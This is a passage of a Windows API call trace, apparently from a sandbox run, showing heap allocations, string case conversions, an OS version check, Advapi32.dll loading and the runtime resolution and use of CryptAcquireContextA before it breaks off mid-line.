[0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0248.233] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.233] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0248.233] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.233] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.233] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0248.234] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0248.234] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0248.234] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.234] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0248.234] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.234] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.234] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.235] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.235] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0248.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0248.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0248.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0248.236] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0248.237] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0248.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0248.237] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0248.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0248.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.238] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0248.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0248.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0248.239] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0248.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0248.239] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0248.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0248.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0248.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0248.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.242] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0248.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0248.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.245] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0248.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0248.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0248.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.246] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.247] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2830) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 